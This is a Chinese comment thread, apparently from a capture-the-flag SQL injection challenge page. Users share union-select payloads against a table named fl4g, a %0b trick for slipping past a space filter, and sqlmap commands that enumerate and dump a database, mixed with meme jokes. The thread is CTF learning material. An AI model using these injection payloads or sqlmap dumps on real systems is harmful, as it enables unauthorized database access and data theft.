一个sqlmap就能完美解决
鸡你太美
哎呦你干嘛
小黑子,哥哥下的蛋你别吃
小黑子
id=-1' union select 1,2,3,skctf_flag from fl4g#
过滤了一些东西,空格用%0b绕过。payload:id=-1' union%0bselect%0bgroup_concat(skctf_flag),2,3,4%0bfrom fl4g#
输入框的sql注入
'闭合,union注入
这题啊,,学了sqlmap使用方法。。自动干进去了,python2 sqlmap.py -u “URL地址” --data=”id=1” --current-db查询当前使用数据库,-D skctf(库名) --tables 查下面所有表,-T fl4g(表名)--columns列出所有的字段名,-C skctf_flag --dump列出字段内容,找到flag
有的方法flag根本出不来
超级简单的sql
为什么提交的flag不对
要提交两次才行
...
评论
Hobin 2年前
举报
一个sqlmap就能完美解决
MONSTEinCAT 2年前
举报
鸡你太美
阿厂 2年前
举报
哎呦你干嘛
肥肠粉 2年前
举报
小黑子,哥哥下的蛋你别吃
Sauexceed 2年前
举报
小黑子
yemur 2年前
举报
id=-1' union select 1,2,3,skctf_flag from fl4g#
lysandria 2年前
举报
过滤了一些东西,空格用%0b绕过。payload:id=-1' union%0bselect%0bgroup_concat(skctf_flag),2,3,4%0bfrom fl4g#
15338641414 2年前
举报
输入框的sql注入
Hey0iopklh 2年前
举报
'闭合,union注入
落叶满阶红 2年前
举报
这题啊,,学了sqlmap使用方法。。自动干进去了,python2 sqlmap.py -u “URL地址” --data=”id=1” --current-db查询当前使用数据库,-D skctf(库名) --tables 查下面所有表,-T fl4g(表名)--columns列出所有的字段名,-C skctf_flag --dump列出字段内容,找到flag
02 2年前
举报
有的方法flag根本出不来
w1707154109 2年前
举报
超级简单的sql
放鹤 2年前
举报
为什么提交的flag不对
MONSTEinCAT 2年前
举报
要提交两次才行